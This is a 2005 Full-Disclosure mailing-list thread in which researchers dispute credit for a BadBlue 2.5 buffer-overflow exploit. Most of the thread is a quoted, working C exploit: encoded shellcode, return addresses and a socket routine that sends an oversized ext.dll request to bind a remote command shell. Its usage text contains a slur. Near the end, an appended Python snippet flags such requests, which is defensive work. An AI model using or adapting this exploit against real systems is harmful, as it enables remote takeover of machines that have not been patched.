List: full-disclosure
Subject: Re: [Full-Disclosure] [HAT-SQUAD] BadBlue,
From: "class 101" <class101 () hat-squad ! com>
Date: 2005-02-28 13:37:55
Message-ID: 002a01c51d9a$b67f6ae0$0200a8c0 () box
next time then publish both at the same time, because coded or not because of timeline, the exploit has been brought in first by hat-squad, sorry ;>
-------------------------------------------------------------
class101
Jr. Researcher
Hat-Squad.com
-------------------------------------------------------------
----- Original Message -----
From: Andres Tarasco
To: 'class101@hat-squad.com'
Cc: 'full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org'
Sent: Monday, February 28, 2005 11:18 AM
Subject: RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)
> Hole History:
>
> 26-2-2005: BOF flaw published by Andres Tarasco of sia.es
> 27-2-2002: Hat-Squad.com releases an exploit
> 28-2-2005: haxorcitos releases a dupe with fake date :>
> or you sux doing private stuffs.
That's simply not true.
Miguel Tarasco developed the first functional exploit for this vulnerability.
This exploit was not published before because of disclosure Timeline.
regards
On Mon, 28 Feb 2005 09:42:11 +0100, class 101 <class101@hat-squad.com> wrote:
> (reposting again with the hole history)
> Andres Tarasco of sia.es has published yesterday a security hole affecting
> BadBlue 2.5 and below.
>
> http://seclists.org/lists/fulldisclosure/2005/Feb/0704.html
>
> Hat-Squad.com brought you a fresh exploit.
> The exploit and BadBlue v2.5 are both available at class101.org for your
> exploitation practices, njoy :)
>
> /*
> BadBlue, Easy File Sharing Remote BOverflow
>
> Homepage: badblue.com
> Affected version: v2.5 (2.60 and below not tested)
> Patched version: v2.61
> Link: badblue.com/bbs98.exe
> Date: 27 February 2005
>
> Application Risk: Severely High
> Internet Risk: Low
>
> Discovery Credits: Andres Tarasco (atarasco _at_ sia.es)
> Exploit Credits : class101 & metasploit.com
>
> Hole History:
>
> 26-2-2005: BOF flaw published by Andres Tarasco of sia.es
> 27-2-2002: Hat-Squad.com releases an exploit
> 28-2-2005: haxorcitos releases a dupe with fake date :>
> or you sux doing private stuffs.
>
> Notes:
>
> -6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by
> BadBlue
> -using offsets from ext.dll, universal.
> -use findjmp2 to quickly search into ext.dll to see
> if the offsets change in the other BadBlue versions below 2.5
> -if you need the v2.5 for exploitation practices, get it on class101.org
> -rename to .c for nux, haven't tested this one but it should work fine.
>
> Greet:
>
> Nima Majidi
> Behrang Fouladi
> Pejman
> Hat-Squad.com
> metasploit.com
> A^C^E of addict3d.org
> str0ke of milw0rm.com
> and my homy class101.org :>
> */
>
> #include <stdio.h>
> #include <string.h>
> #include <time.h>
> #ifdef WIN32
> #include "winsock2.h"
> #pragma comment(lib, "ws2_32")
> #else
> #include <sys/socket.h>
> #include <sys/types.h>
> #include <netinet/in.h>
> #include <netinet/in_systm.h>
> #include <netinet/ip.h>
> #include <netdb.h>
> #include <arpa/inet.h>
> #include <unistd.h>
> #include <stdlib.h>
> #include <fcntl.h>
> #endif
>
> char scode[]=
> /*XORed, I kiss metasploit.com because they are what means elite!*/
> "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x03"
> "\x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\xeb\x82\xa4\xec"
> "\xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x7b\x7a\xb4\x98"
> "\x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x88\x7a\xb5\x22"
> "\xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\xe8\x8f\x60\x47"
> "\x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x48\xf0\x04\x0f"
> "\x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\xc3\x1f\xd0\x53"
> "\x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x6b\xf5\x15\x1d"
> "\xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x6b\x0c\x28\x21"
> "\x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x5c\xf2\xbe\x75"
> "\x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\xf6\xd6\x0c\xec"
> "\xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x65\x13\x5b\x76"
> "\x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\xd5\x11\x4b\x42"
> "\x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x56\x84\x8b\x7b"
> "\xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\xd3\xe8\x33\xf4"
> "\x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x65\x13\x38\x7e"
> "\x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\xe1\x4a\x9b\xe0"
> "\xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\xa8\xd0\x33\x61"
> "\xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x52\x2a\x31\x12"
> "\x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\xfc\xad\x31\xec"
> "\xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x51\x84\x8b\x7b"
> "\xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13";
>
> char payload[1024];
>
> char ebx[]="\x05\x53\x02\x10"; /*call.ext.dll*/
> char ebx2[]="\xB0\x55\x02\x10"; /*pop.pop.ret.ext.dll thx findjmp2 ;>*/
> char pad[]="\xEB\x0C\x90\x90";
> char pad2[]="\xE9\x05\xFE\xFF\xFF";
> char EOL[]="\x0D\x0A\x0D\x0A";
> char talk[]=
> "\x47\x45\x54\x20\x2F\x65\x78\x74\x2E\x64\x6C\x6C\x3F\x6D\x66\x63"
> "\x69\x73\x61\x70\x69\x63\x6F\x6D\x6D\x61\x6E\x64\x3D";
>
> #ifdef WIN32
> WSADATA wsadata;
> #endif
>
> void ver();
> void usage(char* us);
>
> int main(int argc,char *argv[])
> {
> ver();
> unsigned long gip;
> unsigned short gport;
> char *target, *os;
> if (argc>6||argc<3||atoi(argv[1])>3||atoi(argv[1])<1){usage(argv[0]);return -1;}
> if (argc==5){usage(argv[0]);return -1;}
> if (strlen(argv[2])<7){usage(argv[0]);return -1;}
> if (argc==6)
> {
> if (strlen(argv[4])<7){usage(argv[0]);return -1;}
> }
> #ifndef WIN32
> if (argc==6)
> {
> gip=inet_addr(argv[4])^(long)0x93939393;
> gport=htons(atoi(argv[5]))^(short)0x9393;
> }
> #define Sleep sleep
> #define SOCKET int
> #define closesocket(s) close(s)
> #else
> if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
> if (argc==6)
> {
> gip=inet_addr(argv[4])^(ULONG)0x93939393;
> gport=htons(atoi(argv[5]))^(USHORT)0x9393;
> }
> #endif
> int ip=htonl(inet_addr(argv[2])), port;
> if (argc==4||argc==6){port=atoi(argv[3]);} else port=80;
> SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
> s=socket(AF_INET,SOCK_STREAM,0);
> if (s==-1){printf("[+] socket() error\n");return -1;}
> if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro. English\n[+] Win2k SP- - -";}
> if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2 Pro. English\n[+] WinXP SP1a Pro. English\n[+] WinXP SP- - -";}
> if (atoi(argv[1]) == 3){target=ebx2;os="Win2003 SP4 Server English\n[+] Win2003 SP- - -";}
> printf("[+] target(s): %s\n",os);
> server.sin_family=AF_INET;
> server.sin_addr.s_addr=htonl(ip);
> server.sin_port=htons(port);
> if (argc==6){printf("[+] reverse mode disabled for this exploit\n");
> printf("[+] get the source at class101.org and update yourself!\n");return -1;}
> connect(s,( struct sockaddr *)&server,sizeof(server));
> timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
> switch(select(s+1,NULL,&mask,NULL,&timeout))
> {
> case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
> case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
> default:
> if(FD_ISSET(s,&mask))
> {
> printf("[+] connected, constructing the payload...\n");
> #ifdef WIN32
> Sleep(1000);
> #else
> Sleep(1);
> #endif
> strcpy(payload,talk);
> memset(payload+29,0x90,520);
> if (atoi(argv[1]) == 1||atoi(argv[1]) == 2)
> {
> memcpy(payload+29+492,&pad,4);
> memcpy(payload+521+4,target,4);
> memcpy(payload+536+1,pad2,5);
> }
> else
> {
> memcpy(payload+29+485,&pad,4);
> memcpy(payload+514+4,target,4);
> memcpy(payload+529+1,pad2,5);
> }
> strcat(payload,EOL);
> memcpy(payload+36+3,scode,strlen(scode));
> if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
> #ifdef WIN32
> Sleep(2000);
> #else
> Sleep(2);
> #endif
>
> printf("[+] size of payload: %d\n",strlen(payload));
> printf("[+] payload sent.\n");
> return 0;
> }
> }
> closesocket(s);
> #ifdef WIN32
> WSACleanup();
> #endif
> return 0;
> }
>
> void usage(char* us)
> {
> printf("USAGE:\n");
> printf(" [+] . 101_bblu.exe Target VulnIP (bind mode)\n");
> printf(" [+] . 101_bblu.exe Target VulnIP VulnPORT (bind mode)\n");
> printf(" [+] . 101_bblu.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode)\n");
> printf("TARGET: \n");
> printf(" [+] 1. Win2k SP4 Server English (*)\n");
> printf(" [+] 1. Win2k SP4 Pro English (*)\n");
> printf(" [+] 1. Win2k SP- - - \n");
> printf(" [+] 2. WinXP SP2 Pro. English \n");
> printf(" [+] 2. WinXP SP1a Pro. English (*)\n");
> printf(" [+] 2. WinXP SP- - - \n");
> printf(" [+] 3. Win2k3 SP0 Server Italian (*)\n");
> printf(" [+] 3. Win2k3 SP- - - \n");
> printf("NOTE: \n");
> printf(" The exploit bind a cmdshell port 101 or\n");
> printf(" reverse a cmdshell on your listener.\n");
> printf(" A wildcard (*) mean tested working, else, supposed working.\n");
> printf(" A symbol (-) mean all.\n");
> printf(" Compilation msvc6, cygwin, Linux.\n");
> return;
> }
> void ver()
> {
> printf(" \n");
> printf(" ===================================================[0.1]=====\n");
> printf(" ================BadBlue, Easy File Sharing 2.5===============\n");
> printf(" ================ext.dll, Remote Stack Overflow===============\n");
> printf(" ======coded by class101==================[Hat-Squad.com]=====\n");
> printf(" =====================================[class101.org 2005]=====\n");
> printf(" \n");
> }
>
> -------------------------------------------------------------
> class101
> Jr. Researcher
> Hat-Squad.com
> -------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
--
Loco de aTar
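As an added defender-side example (not part of the original post or of the exploit above), the Python below inspects raw HTTP requests for the shape of the request that exploit sends: a GET to /ext.dll whose mfcisapicommand parameter is oversized, made of non-printable bytes, or carries a long 0x90 NOP sled. The 400-byte threshold, the 16-byte sled cutoff and the sample requests are constructed assumptions, not values from the advisory.

```python
"""Flag suspicious mfcisapicommand requests to BadBlue's ext.dll (added example)."""
from dataclasses import dataclass
from typing import List, Optional

# Assumptions: legitimate mfcisapicommand values are short ASCII tokens;
# the exploit pads the parameter with hundreds of 0x90 bytes.
MAX_COMMAND_LEN = 400
MIN_NOP_SLED = 16


@dataclass
class Finding:
    reason: str
    length: int
    nop_run: int


def extract_command(raw: bytes) -> Optional[bytes]:
    """Return the raw mfcisapicommand value of a GET /ext.dll request, else None.

    Works on bytes (no URL decoding) because the exploit sends the parameter as
    raw binary rather than percent-encoded text.
    """
    request_line = raw.split(b"\r\n", 1)[0]
    fields = request_line.split(b" ")
    if len(fields) < 2 or fields[0] != b"GET":
        return None
    path, _, query = fields[1].partition(b"?")
    if not path.lower().endswith(b"/ext.dll"):
        return None
    for param in query.split(b"&"):
        key, _, value = param.partition(b"=")
        if key.lower() == b"mfcisapicommand":
            return value
    return None


def _longest_run(data: bytes, byte: int) -> int:
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == byte else 0
        best = max(best, cur)
    return best


def inspect_request(raw: bytes) -> Optional[Finding]:
    """Return a Finding when the ext.dll command looks like overflow padding."""
    value = extract_command(raw)
    if value is None:
        return None
    nop_run = _longest_run(value, 0x90)
    non_printable = sum(1 for b in value if b < 0x20 or b > 0x7E)
    reasons = []
    if len(value) > MAX_COMMAND_LEN:
        reasons.append(f"command length {len(value)} > {MAX_COMMAND_LEN}")
    if nop_run >= MIN_NOP_SLED:
        reasons.append(f"NOP sled of {nop_run} bytes")
    if non_printable:
        reasons.append(f"{non_printable} non-printable bytes")
    if not reasons:
        return None
    return Finding("; ".join(reasons), len(value), nop_run)


def inspect_all(requests: List[bytes]) -> List[Finding]:
    return [f for f in (inspect_request(r) for r in requests) if f is not None]


# Constructed sample traffic (not captured data).
BENIGN_REQUEST = b"GET /ext.dll?mfcisapicommand=search HTTP/1.0\r\nHost: fileserver\r\n\r\n"
# Same layout as the exploit's request line: ext.dll command followed by 520 NOPs.
SUSPICIOUS_REQUEST = b"GET /ext.dll?mfcisapicommand=" + b"\x90" * 520 + b"\r\n\r\n"
# Long parameter to another path: not the ext.dll handler, so not flagged here.
OTHER_PATH_REQUEST = b"GET /index.html?q=" + b"A" * 600 + b" HTTP/1.0\r\n\r\n"

if __name__ == "__main__":
    for finding in inspect_all([BENIGN_REQUEST, SUSPICIOUS_REQUEST, OTHER_PATH_REQUEST]):
        print(f"ALERT: {finding.reason}")
```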
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html